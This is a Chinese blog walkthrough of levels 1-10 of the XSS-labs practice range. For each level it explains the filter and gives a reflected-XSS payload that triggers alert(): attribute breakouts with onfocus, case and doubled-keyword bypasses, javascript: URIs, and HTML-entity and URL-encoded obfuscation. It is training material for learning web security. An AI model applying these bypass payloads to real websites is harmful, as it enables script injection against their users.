XSS-labs 1-10关

最新推荐文章于 2024-06-01 13:14:29 发布
最新推荐文章于 2024-06-01 13:14:29 发布
阅读量31 收藏
点赞数
分类专栏: # XSS 文章标签: xss 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134324918
版权

XSS-labs

1

<script>alert(/gjl/)</script>

image-20231109213541565

2

image-20231109213907809

源码

image-20231109213924317

左边补引号和大于号

?keyword="><script>alert(/gjl/)</script>

image-20231109214040546

3

尖括号被过滤,但输入内容显示再下方的input标签中

image-20231109220207306

使用 '匹配 value 的' 跳出 value,在 input 标签中添加事件

?keyword='οnfοcus='alert(/gjl/)

image-20231109220530824

4

尖括号被过滤

image-20231109220649417

双引号匹配跳出 value

?keyword="οnfοcus="alert(/gjl/)

image-20231109220917187

5

image-20231109221100352

image-20231109221134846

?keyword="><a href="javascript:alert(/gjl/)">click</a>"

image-20231109221901795

6

image-20231109222626149

大小写绕过

?keyword=" Onfocus="alert(/gjl/)

image-20231109222544864

7

?keyword="oonnfocus="alert(/gjl/)

image-20231109222828716

8

javascript 被过滤

image-20231109223324836

编码绕过

image-20231109223604263

// 攻击代码
?keyword=javascript:alert(/gjl/)
// 对 javascript 十进制编码
?keyword=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(/gjl/)
// 对输入的参数进行 url 编码
?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%3Aalert(%2Fgjl%2F)

image-20231109224123037

9

连接不合法

image-20231109224342702

输入 http:// 的时候合法

image-20231109224756839

image-20231109225708310

编码

?keyword=javascript:alert('http://')

?keyword=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://')

?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%3Aalert('http%3A%2F%2F')

image-20231109225532747

10

没有 value=keyword 的输入框

有三个隐藏的输入框

image-20231110085412891

尝试给三个输入框传参

image-20231110090130455

发现只有 t_sort 可以传参

image-20231110090157382

?t_sort="οnfοcus="alert(/gjl/)

image-20231110090438962

gjl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有xss漏洞攻击专项练习,一共有二十,也是小白的看门砖吧!
xss-labs-master.zip(xss注入通游戏/靶场)
03-21
经典的xss注入通游戏,搭建简单。适合网络安全测试人员
xss-labs 1-10
Abc_Kimball的博客
01-31 242
level 1-10Leevel1Level2Level3level4Level5Level6Level7Level8Level9Level10 Leevel1 打开第一开启xss之旅 根据sql注入感觉,URL中的name=test貌似是注入点 不知道大佬为什么感觉这是注入点,我就是觉得URL就是注入点 看别人的是name=通了说明是可以的 OK!下一题 Level2 查看被input和value包含着 所以采用把前面的闭合的方式 "> Level3 onclick 事件 Event
XSS-labs(1-10)闯详解
m0_46467017的博客
07-25 2700
通过查看可以知道本与上一的不同,在于转换后的内容不同,虽然添加了大小写转换,但是因为转换后,字符被转换为空字符,所以转换后的字符如何仍可以组合成,那么就可以绕过该防御机制。进入第八后,发现无法构造闭合,采用是采用了htmlspecialchars($str)函数,而且闭合方式是双引号,所以input中无法注入,但是在连接里面是有地方可以注入的。右键查看源代码,发现我们输入的>,.........
xss-labs1-10
qq_46527080的博客
12-25 240
第一 第一超级简单直接插入常规表单 http://127.0.0.1:8086/xss/level1.php?name=<script>alert("xss")</script> 第二(html实体转换过滤) 源码分析 运用了htmlspecialchars函数,htmlspecialchars — 将特殊字符转换为 HTML 实体,本函数会返回字符转义后的表示。 运用此函数的意思就是将http://127.0.0.1:8086/xss/level2.php?keyword
xss-labs靶场1-5
zyh1588的博客
11-21 248
小白回顾xss靶场1-5
渗透测试之XSSxss-labs 1-10总结
白帽子九一
11-18 914
XSS原理: 全称跨站脚本,某种意义上也是一种注入攻击,指攻击者在被攻击的页面上注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行。xss不仅扩展javascript代码,还包括flash等其他脚本语言。xss攻击针对的是客户端的攻击,受害者是用户,网站管理员也是用户之一,攻击者可以假冒管理员身份对网站实施攻击。 产生的危害有: 盗取cookie,修改网页内容,网页挂马,利用网页重定向,xss蠕虫。 第一: 没有输入框,那直接在url中写入一段js代码试试(get型): <scri
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 3477
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
【网络安全 --- xss-labs靶场通(11-20)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-23 1133
【网络安全 --- xss-labs靶场通(11-20)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
XSS-labs详解
ytdd66的博客
03-23 1481
进入靶场点击图片,开始我们的XSS之旅!
xss-labs/level10
m0_71299382的博客
11-29 194
xss-labs/level10
XSS-Labs靶场“1-5”教程
钟言的博客
03-04 6813
本篇为XSS-Labs靶场的第1-5教程,详细内容包含了:一、了解XSS 1、认识XSS攻击 2、XSS攻击危害 3、XSS攻击防御 4、反射型XSS 5、常用XSS攻击语何二、第一 不做限制三、第二 逃逸双引号四、第三 单引号绕过五、第四 过滤第五a标签绕过六、等等内容
xss-labs-master源码
07-06
20xss靶场练习,帮助了解xss
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS
【杂记-浅谈XSS跨站脚本攻击】
叫我小虎就行了的博客
05-31 616
【杂记-浅谈XSS跨站脚本攻击】
xss靶场之xss.haozi
最新发布
weixin_46954909的博客
06-01 555
这题显而易见的是括号不能使用了,我们的办法是替代法和进行编码,使用`来替代()或者使用编码的方式来替代掉括号,但要注意的是,script不能解析编码,所以script标签不能用编码的方式。这题没什么好说的,就是闭合+注释,搭配上script语句就可以了,虽然将&,’”<>/\都编码了,但是这就是典型的骗自己,因为即时编码了,但在img标签里也是能解析的,所以相当于徒劳。这题我们观察到直接输入,他是在input语句的属性值中,无法执行我们的js语句,所以我们的思路也是直接闭合掉语句,执行js语句。
记录一次前端页面崩溃的产生及处理
weixin_51123079的博客
05-30 511
记录一次前端页面崩溃的产生及处理
前端开发记录
qq_25806839的博客
05-31 165
【代码】前端开发记录。
Vue3实战笔记(52)—Vue 3封装持仓分析饼图
山花的博客
05-30 524
接上文,封装持仓分析饼图。封装好几个组件,用于后续开发。把忧愁煮成茶,让它在心间慢慢沉淀,剩下的,便是清甜的回味。
xss-labs第14
08-18
- *3* [渗透测试之---xss-labs闯【1-14】](https://blog.csdn.net/qq_43168364/article/details/105523753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值